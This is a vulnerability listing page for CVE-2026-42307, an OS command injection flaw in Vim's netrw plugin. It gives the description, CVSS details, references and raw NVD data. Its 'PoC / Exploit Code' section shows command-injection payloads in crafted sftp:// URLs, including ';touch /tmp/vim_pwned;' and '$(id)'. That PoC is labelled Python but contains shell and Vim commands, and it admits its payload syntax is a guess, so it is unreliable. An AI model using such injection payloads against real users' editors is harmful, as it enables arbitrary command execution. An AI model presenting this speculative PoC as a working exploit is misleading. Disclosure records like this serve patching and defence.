CVE-2026-42307

Description

Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383.

CVSS Details

CVSS Score

4.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vim < 9.2.0383

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit PoC for CVE-2026-42307
# Description: Trigger command injection via netrw crafted URL.
# Usage: Open the file with Vim or execute the command directly.

# Method 1: Command line invocation
vim 'sftp://;touch /tmp/vim_pwned;'

# Method 2: Inside Vim (Ex mode)
:e sftp://$(id)

# Note: The exact payload syntax depends on the specific vulnerability in netrw's URL parsing.
# This demonstrates the concept of injecting commands via the protocol handler.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42307
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42307
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42307/
[4] VulDB https://vuldb.com/cve/CVE-2026-42307
[5] https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc
[6] https://github.com/vim/vim/releases/tag/v9.2.0383
[7] https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42307", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:36.777", "lastModified": "2026-05-08T23:16:36.777", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/releases/tag/v9.2.0383", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx", "source": "[email protected]"}]}}